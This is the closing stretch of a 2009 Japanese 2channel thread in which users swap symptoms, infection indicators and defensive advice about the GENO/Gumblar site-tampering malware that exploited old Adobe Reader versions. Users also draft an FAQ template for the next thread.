次スレはこのスレを叩き台にしてテンプレある程度纏めないといけないな

898:名無しさん@お腹いっぱい。
09/05/16 03:40:19
インフル怖いなぁ外出もできやしないよ

ネサフでもするかー


アウトー

899:名無しさん@お腹いっぱい。
09/05/16 03:40:46
>>892
ネットしなきゃいいの

900:名無しさん@お腹いっぱい。
09/05/16 03:41:09
>>899
死んでしまうよ

901:名無しさん@お腹いっぱい。
09/05/16 03:42:39
2ちゃんだけしてればいいんだよ

902:357
09/05/16 03:42:40
とりあえず、このスレの
>>1-15
までは読んで実行しないと、お話にならない。
>>4は無視。

以下、感染した、とあるサイトのお詫び文(一部、俺が改変)と対処法(あくまで今のところ、明日になれば通用しないかも)

サイトをブラウザーでご覧いただいた方にウィルス感染の恐れがあることが判明しました。
弊社サイトをご利用いただいている皆様には大変ご迷惑をおかけしましたことをお詫び申し上げます。
現在は、改ざんされたページの修正を完了しており、ご覧いただいてもウィルス感染の恐れはございません。サイトの安全管理には万全を期して参りますので今後ともよろしくお願い申し上げます。


※当該サイトには個人情報は保存されておりませんので流出の恐れはございません。
※Windows Vista以降、Macは、感染の恐れはございません。

感染するシステム

Windows XP以前のOS(XP / 2000など)で、Acrobat Reader、Adobe Readerのバージョンが古い場合
(■俺注:ME以前は論外 古いとは、5/12に最新になった9.1.1よりも前の9.1とかをさす。 reader7も8も5/12以降にアップしていなきゃNG)



903:名無しさん@お腹いっぱい。
09/05/16 03:42:43
>>900
死ねばいいの

904:名無しさん@お腹いっぱい。
09/05/16 03:43:56
もはやバージョンアップのためにネットにつなぐことすら怖い

905:357
09/05/16 03:43:59
続き。

Web ページの表示に使われるhtmlファイルの一部に第三者のサイトより攻撃プログラムをダウンロードするJava Scriptが埋め込まれました。この攻撃プログラムは、Acrobat Reader、Adobe Readerの脆弱性を利用してパソコンの中にスパイプログラムを送り込みます。
Windows XP、2000とAcrobat Reader、Adobe Readerの古いバージョンが組み合わさった場合、この攻撃を受けてしまいます。
(■俺注:5/12より前の古いバージョンを使っていれば、基本的に感染するが、運良く初期設定を変更していてJavaScriptを切っていれば感染しない 切る方法は>>3 だが、既に感染していれば手遅れ 感染していない人も切る事を推奨)

感染した場合、次の様な問題が発生します(以下はあくまで症状の一例。他は>>1)。

・ヘルプファイルの改ざん
C:\Windows\System32のsqlsodbc.chmファイルを改ざんします。(スパイプログラムのデータ置き場に利用されています。)
ファイルサイズが1000バイト程度の場合は、改ざんされています。

・コマンドプロンプトが起動できなくなる
コマンドプロンプトを起動するとエクスプローラーが再起動します。また、この影響でレジストリエディタが起動できなくなります。

続く。

906:名無しさん@お腹いっぱい。
09/05/16 03:44:12
感染していたサイトがなんの謝罪もなく復活してる件について

907:名無しさん@お腹いっぱい。
09/05/16 03:44:44
avastお前だけが頼りだ

908:名無しさん@お腹いっぱい。
09/05/16 03:45:53
2ちゃんしか見てないのにAdobeReaderが勝手に起動した
もうこわいやだもう泣きそう

909:名無しさん@お腹いっぱい。
09/05/16 03:46:08
同人板と協力したらどうだ

910:名無しさん@お腹いっぱい。
09/05/16 03:46:57
>>908
マジで?

911:名無しさん@お腹いっぱい。
09/05/16 03:47:07
>>910
マジ

912:名無しさん@お腹いっぱい。
09/05/16 03:47:23
だからavast入っててもヒューリスティック最大にしなきゃ意味ないって

913:名無しさん@お腹いっぱい。
09/05/16 03:47:26
>>908
単なる自動アップデートとかじゃねぇのか?

914:名無しさん@お腹いっぱい。
09/05/16 03:47:33
>>911
ブラウザ何?
専ブラじゃないだろ

915:名無しさん@お腹いっぱい。
09/05/16 03:47:33
>>908
2ちゃんだけしか見てなくてそれは無い。


916:名無しさん@お腹いっぱい。
09/05/16 03:47:54
>>908
お前IEで見てるだろ

917:名無しさん@お腹いっぱい。
09/05/16 03:48:15
>>914
jane…

918:名無しさん@お腹いっぱい。
09/05/16 03:48:16
すみませーん

股がスルメ臭いです

どうすれば?

919:名無しさん@お腹いっぱい。
09/05/16 03:48:25
>>908
2chからリンクしてるサイトは2chじゃないとこもあるぞ

920:名無しさん@お腹いっぱい。
09/05/16 03:49:45
>>917
じゃあリンク踏んでないか?
専ブラでありえないわー

921:名無しさん@お腹いっぱい。
09/05/16 03:50:26
スレ速度の推移

URLリンク(ranking.sitepedia.jp)


922:名無しさん@お腹いっぱい。
09/05/16 03:50:36
>>880
>>241が事実なら、そこが対策できたことを確認し、
ついでに自社内をチェックし終えてから、やっと報道する予感。

>>908
単に、自動更新しにいった→UPDATEモジュール拾ったから起動…だといいな

923:名無しさん@お腹いっぱい。
09/05/16 03:51:28
誰か安眠をくれ…

924:名無しさん@お腹いっぱい。
09/05/16 03:51:55
少し前には、広告に紛れてた事が無かったっけか


flashを確認制にしたいんだけど、noscript使うしかないのかな
このくらい、標準で設定用意しておいてくれと思うんだが


925:名無しさん@お腹いっぱい。
09/05/16 03:52:25
阿呆な質問するけど誰か教えてくれ

感染してるサイトにこっちからアクセスすると
自分も感染するというのは分かったけど
じゃあ逆に
感染してる奴が感染してないサイトにアクセスしたらどうなるの?

926:名無しさん@お腹いっぱい。
09/05/16 03:52:35
>>923
ネット接続切れば安眠できるよ

927:名無しさん@お腹いっぱい。
09/05/16 03:52:58
Adobe Flash Player
Adobe Acrobat Reader

この2つアンインストールすりゃ絶対に感染する事ないんでしょ?

928:名無しさん@お腹いっぱい。
09/05/16 03:53:30
絶対はないからこれからもドキドキしててね

929:名無しさん@お腹いっぱい。
09/05/16 03:53:39
>>921
深夜に伸び続けてるのが凄いなw

930:名無しさん@お腹いっぱい。
09/05/16 03:53:44
>>925
別になにも起きないんじゃないかな

931:名無しさん@お腹いっぱい。
09/05/16 03:53:56
.が-にかわっているだけでほぼ>>814のコードなんだけど
これって今回のウィルス?

932:名無しさん@お腹いっぱい。
09/05/16 03:54:18
>>927
フラッシュプレイヤーが使えないと不便じゃないか?

933:名無しさん@お腹いっぱい。
09/05/16 03:54:35
>>925
流石にそれでサイトに感染したりしたらもうネットは終わり

934:357
09/05/16 03:54:44
>>3 のステップ1をやらずに、>>1 の症状のどれか一つでもある人は、
感染を疑った方がいい。

感染後の対処法も>>902のサイトに書かれているけど、
一度感染したら最後、勝手にどんどんアップデートするマルウェアなので、その対処法で十分かは疑わしい。
>>5のようなこと(ほとんどのセキュリティーソフトが機能しない状態)になってるのも同じ理由。

したがって、クリーンインストールしなおしが冗談抜きで、唯一の現実的な選択。


お詫び文の中にもこのような記述がある↓
このお知らせを作成した2009/5/14時点では、各社セキュリティーソフトでは検出されませんが、
セキュリティーソフトの検出パターンに反映されましたら、検査を行ってください。
下記リンク先のブラウザーから実行できるオンラインスキャン(無料)をご利用いただけます。

トレンドマイクロ社オンラインスキャンを開きます。
URLリンク(www.trendmicro.co.jp)


つづく。

935:名無しさん@お腹いっぱい。
09/05/16 03:55:06
>>927
ネットに繋がっている限り感染する可能性があることを忘れるな

だったら「絶対」大丈夫じゃない?


936:名無しさん@お腹いっぱい。
09/05/16 03:55:23
>>927
ウイルスをディスアセンブルして挙動を確認しない限り絶対はない。
解析したとしても亜種に限っては絶対とは言えない。
これは現行判断のすべての材料に及ぶ。
既に亜種にはsqlsodbc.chmを改変しない物もある。当然avastなどのソフトに引っかからない物もあるだろう

937:名無しさん@お腹いっぱい。
09/05/16 03:56:04
Vistaは感染しないのか?
昨日からIEが落ちまくっててOpera使ってるんだけどウイルス関係ないのかな
ちなみにソフトはマカフィー

938:名無しさん@お腹いっぱい。
09/05/16 03:56:46
マカフィーなんてさっさと投げ捨てろ

939:名無しさん@お腹いっぱい。
09/05/16 03:57:28
「FTPで接続」した場合はログインIDとパスワードを盗まれ
今後そのFTPサイト内が改竄される可能性がある

940:名無しさん@お腹いっぱい。
09/05/16 03:57:34
マカフィーのメール監視が重くて泣いた5年前

941:名無しさん@お腹いっぱい。
09/05/16 03:57:38
■質問する前にまず>>1からログ全部読め

■「こうすれば大丈夫!安心!」なんて対策は今のところ無い。

942:名無しさん@お腹いっぱい。
09/05/16 03:57:41
とりあえず歯磨いて顔洗ってこよう…

943:名無しさん@お腹いっぱい。
09/05/16 03:57:51
【管理も】同人サイト・GENOウィルス注意【閲覧も】
スレリンク(doujin板)

115 GENO sage New! 2009/05/16(土) 00:10:05 ID:GcV0AjPS0
てかセキュリティ板の連中も大したことないなぁ。
ニュー速レベルじゃんw





944:名無しさん@お腹いっぱい。
09/05/16 03:58:21
絶対まではいかないにしても2つともあるやつよりないやつのほうが感染しにくいって事でおk?
Adobe Flash Player
Adobe Acrobat Reade

945:名無しさん@お腹いっぱい。
09/05/16 03:58:35
vistavistaうぜえ
ID=xxでvistaもおkなウイルスでねーかな

946:名無しさん@お腹いっぱい。
09/05/16 03:59:14
>>941
俺のレスが引用されてるw

947:名無しさん@お腹いっぱい。
09/05/16 03:59:29
予防接種と同様にお考え下さい

948:名無しさん@お腹いっぱい。
09/05/16 03:59:47
>>930>>933
無いとは思ったけど誰かに否定して欲しかった
どうもありがとう

949:名無しさん@お腹いっぱい。
09/05/16 04:00:03
どっちのスレも見てるからちょっと楽しい

950:名無しさん@お腹いっぱい。
09/05/16 04:00:19
ニフティーの奴って感染してたの一人だけ?

951:名無しさん@お腹いっぱい。
09/05/16 04:01:05
【管理も】同人サイト・GENOウィルス注意【閲覧も】
スレリンク(doujin板)
のりこめー^^

952:名無しさん@お腹いっぱい。
09/05/16 04:01:10
>>932
サブマシーンで使うからOK
感染したら即再セットアップ
メインはパスワード入力しまくりだからかなり怖い

953:名無しさん@お腹いっぱい。
09/05/16 04:01:34
テンプレ整備して次スレの頃合じゃね

954:名無しさん@お腹いっぱい。
09/05/16 04:02:11
・sqlsodbc.chmを改変
・cmd.exe、regedit.exeが起動不能
・一部のアンチウイルスソフトが更新不能
・特定サイトにアクセス不能(Windows Update、アンチウイルスソフト関連サイト)
・ネットワークのトラフィックを監視、ユーザー名やパスワード等の情報を収集
・Googleの検索結果を改竄(リンクを弄る)
・explorer.exeや一部のブラウザが異常終了
・Acrobatが勝手に起動
・PDFファイルやシステムファイルが増殖
・CPU、メモリ使用率がUP
・再起動時にBSOD

感染が疑わしい人は迷わずクリーンインストール推奨です。
★Anubisレポート
URLリンク(anubis.iseclab.org)

★GENOウイルスまとめ
URLリンク(www29.atwiki.jp)
★このサイトは諸事情により内容を書き換え
URLリンク(www3.atword.jp)



955:名無しさん@お腹いっぱい。
09/05/16 04:03:02
諸事情でAdobe Reader 最新版を使わざるを得ない場合
2009年4月29日現在の最新版バージョン9.1設定例

1.Adobe Readerを起動し「編集」メニューの「環境設定」
  「Acrobat JavaScriptを使用」のチェックボックスをオフ(チェックを外す)
  OKを押して設定確定後、Adobe Readerを終了。

2.必要と好みに応じて Adobe Reader Speed-Up にてプラグインを整理
  設定は SpeedUp - Fast がおすすめ。
   注意すべきは
   Acroform(拡張子なし)
   Annotations(拡張子なし)
   これら2つのチェックボックスをオン(チェックが入っている)状態にしておく必要がある。
   そうしないと Adobe Reader が起動しなかったりする。

   このとき追加作業として
   EScript.apiとEScript.JPNのチェックボックスをオフ(チェックを外す)状態にしておくと
   より安心かもしれない。

以下はお約束
上に書いたことを行えば安全という保証はなく、すべて自己責任でお願いします。
またAdobe Reader以外の環境設定をどうするかも各自考える必要があります。


956:名無しさん@お腹いっぱい。
09/05/16 04:03:05
>>950
個人サイトがいくつかやられてる模様
これはニフティーどうこうって問題じゃないよ
他のドメインでも個人サイトで感染してるところはあるわけだし
個人どころか商用でも感染してるわけだけど

957:名無しさん@お腹いっぱい。
09/05/16 04:03:50
・sqlsodbc.chmを改変
・cmd.exe、regedit.exeが起動不能
・一部のアンチウイルスソフトが更新不能
・特定サイトにアクセス不能(Windows Update、アンチウイルスソフト関連サイト)
・ネットワークのトラフィックを監視、ユーザー名やパスワード等の情報を収集
・Googleの検索結果を改竄(リンクを弄る)
・explorer.exeや一部のブラウザが異常終了
・Acrobatが勝手に起動
・PDFファイルやシステムファイルが増殖
・CPU、メモリ使用率がUP
・再起動時にBSOD

感染予防対策

1.Adobe Flash Player の最新版にアップデート
2.Adobe Acrobat Reader の最新版にアップデート
3.NoScriptの導入(Firefoxの導入)
4.Adobe Acrobat Readerの JavaScript 機能OFF
5.危険IPのブロック

随時追加



958:名無しさん@お腹いっぱい。
09/05/16 04:03:53
関連スレに
【管理も】同人サイト・GENOウィルス注意【閲覧も】
スレリンク(doujin板)
貼っておくといいかも
あっち初心者でもわかるように説明してるし

959:名無しさん@お腹いっぱい。
09/05/16 04:04:21
以下攻撃されたサイト
小林製薬
URLリンク(www.kobayashi.co.jp)

国内の正規サイト改ざん:攻撃サイトを変え再襲来
URLリンク(www.so-net.ne.jp)


★感染を疑った人の報告
【OS】
【使用セキュリティソフト】
【疑った理由】
【症状】
【確認手段】
【結果】



960:名無しさん@お腹いっぱい。
09/05/16 04:05:22
>>954
>>955
>>957
>>959
>>958こんな感じでいいかな?


961:357
09/05/16 04:05:59
クリーンインストール後は
>>8-9
もしくは、ReaderもFlashも完全にアンインストール。

さらに、Firefox3.0.10をデフォルトブラウザにして
(やり方が分からなきゃ、アンインストールしてインストールしなおせば、デフォルトブラウザにするか?とたずねられるからYES)
専ブラから開くブラウザもFirefoxへ変更。
Firefoxのツール>アドオン>プラグインでadobeAcrobatやらFlash含め全部オフ



962:名無しさん@お腹いっぱい。
09/05/16 04:07:15
>>956
>ニフティーどうこうって
それはわかってるんだけど
ニフティーのドメインで何度かトロイの警告でてたからどうなのかと思っただけさ

963:名無しさん@お腹いっぱい。
09/05/16 04:07:31
>>961
参考になりました!

964:名無しさん@お腹いっぱい。
09/05/16 04:08:07
もうやだよ
こんな思いをなんでするのさ

965:名無しさん@お腹いっぱい。
09/05/16 04:09:00
>>945
出なくていいよ、カス

966:名無しさん@お腹いっぱい。
09/05/16 04:09:28
>>962
警告出たならそのとおりなんでしょう

967:名無しさん@お腹いっぱい。
09/05/16 04:10:20
管理人とか感染気付いてない場合ってあるのだろうか

968:名無しさん@お腹いっぱい。
09/05/16 04:10:31
>>931
そう
難読化されたコードはほぼ別々
難読化前のコードはどれも同じだけど

969:名無しさん@お腹いっぱい。
09/05/16 04:10:42
>>967
そりゃあるだろ

970:名無しさん@お腹いっぱい。
09/05/16 04:12:08
テレビで早く報道されたほうがいい
大多数の人たちはこの怖さ理解できていない

971:名無しさん@お腹いっぱい。
09/05/16 04:12:28
Firefoxの大勝利

972:名無しさん@お腹いっぱい。
09/05/16 04:12:41
>>967
確実にそっちのほうが多いだろ

973:名無しさん@お腹いっぱい。
09/05/16 04:13:07
真の勝利者はVista

974:名無しさん@お腹いっぱい。
09/05/16 04:13:09
確かにパソコンが画期的に使いづらくはなるが個人情報が抜かれるみたいな
破滅的なことはないから報道はされないと思われる

975:名無しさん@お腹いっぱい。
09/05/16 04:13:48
>>960
ぶっちゃけ初心者はスキャン結果の見方すらわかんないだろうし
何をどう説明したって無駄な気もするんだが
それでも何も手を差し伸べないわけにもいかんし
時々イラッと来ることもあるが
そこら辺は仕方ないと諦めて
テンプレはそんなもんでいんじゃね?

あと個人的願望↓
痛いニュース辺りで取り上げてくれれば情報は一気に広まると思うんだけどなあ

976:357
09/05/16 04:13:59
>>475
もテンプレ頼むわ。

sqlsodbc.chmを改変のハッシュ値も張った方がいい。
俺は忘れちまった。
既にブロックするブラックリストにGumblar.cnを登録しちまったから、検索できない。
誰か頼む。

あと、プリフェチを使わない方法も。

ああ、1000までに書ききれない。

977:名無しさん@お腹いっぱい。
09/05/16 04:14:18
痛いニュース、頼んだぞ

978:名無しさん@お腹いっぱい。
09/05/16 04:14:57
>>974

抜かれるぞ よゆうで
お金も抜かれるかもな

979:名無しさん@お腹いっぱい。
09/05/16 04:15:22
Adobe Flash PlayerとAdobe Readerの違いがわからないんだけど
すべてのプログラムにAdobe Readerしか無かったってことはAdobe Flash Playerインストールしてないのかな
どこにあるかどうやって探すんですか?

980:名無しさん@お腹いっぱい。
09/05/16 04:15:41
キャプチャもとりほうだい

なんでもできる危険なウイルスだぞ

981:名無しさん@お腹いっぱい。
09/05/16 04:15:58
よし、いつもネットばっかしてて描けないしこういう時こそ絵を描こう

982:名無しさん@お腹いっぱい。
09/05/16 04:16:32
>>968
ありがとうございます
相手の管理人に連絡とってみます

983:名無しさん@お腹いっぱい。
09/05/16 04:16:45
週末恒例俺のエロサイト巡りの時間を返せ!

984:名無しさん@お腹いっぱい。
09/05/16 04:16:47
firefoxのアドオンで停止すべきなのはreaderとshockwaveflashでおk?

985:名無しさん@お腹いっぱい。
09/05/16 04:16:55
あらゆるパスワード抜けるし大概のことはできるぜひゃっほーー!!

こわすぎる

986:名無しさん@お腹いっぱい。
09/05/16 04:17:15
では、立ててくる。
補完宜しくです。

987:名無しさん@お腹いっぱい。
09/05/16 04:17:18
地雷がどこに埋まっているか分からない状態でネットサーフィンか・・・怖いね。
このウィルスに関してはアンチウィルスソフトもあてにならないし・・・。
(((( ;゚Д゚)))ガクガクブルブル

普段行かないサイトには関わらないほうがいいね。
普段行ってるサイトでもセキュリティーが駄目そうなところには行かないほうが良さそう・・・。
(((( ;゚Д゚)))ガクガクブルブル

988:名無しさん@お腹いっぱい。
09/05/16 04:17:45
>>978>>980
超危険なのね
早く警察か公務員が感染しないかなぁ
そうすれば、公になる

989:名無しさん@お腹いっぱい。
09/05/16 04:17:47
>>979
フラッシュゲームが出来なければ無い

990:名無しさん@お腹いっぱい。
09/05/16 04:17:52
web制作会社も感染してるらしいので
これから公式サイトとかもがんがん感染しだすんじゃねーの

991:名無しさん@お腹いっぱい。
09/05/16 04:18:43
豚インフルエンザどころの騒ぎじゃねえな・・・。

992:名無しさん@お腹いっぱい。
09/05/16 04:19:28
股が臭い16の夜

993:名無しさん@お腹いっぱい。
09/05/16 04:19:31
>>990

どういう意味

994:名無しさん@お腹いっぱい。
09/05/16 04:19:36
誰かが宣言無しで立ててた

995:名無しさん@お腹いっぱい。
09/05/16 04:19:59
せんせーい
2つもすれたってまーす

996:名無しさん@お腹いっぱい。
09/05/16 04:20:10
重複w

997:357
09/05/16 04:20:22
>>984
そうだけど、Javaもしょちゅう狙われるから切った方がいい。
最新は13ね。

というか、せめて沈静化するまでは、全部切るのが一番いいんだが・・・。

998:名無しさん@お腹いっぱい。
09/05/16 04:20:23
重複してんじゃん

999:名無しさん@お腹いっぱい。
09/05/16 04:20:45
てか向こうジャンル晒しなんか心底どうでもいいからドメイン晒してほしいナー

1000:名無しさん@お腹いっぱい。
09/05/16 04:21:03
>>989
フラッシュゲームやったことないです
avastが有効ってレスもあるのでAdobe Flash Playerと一緒にインストールしたいんですが
その二つはググっても大丈夫ですかね。。

1001:1001
Over 1000 Thread
このスレッドは1000を超えました。
もう書けないので、新しいスレッドを立ててくださいです。。。


最新レス表示
レスジャンプ
類似スレ一覧
スレッドの検索
話題のニュース
おまかせリスト
オプション
しおりを挟む
スレッドに書込
スレッドの一覧
暇つぶし2ch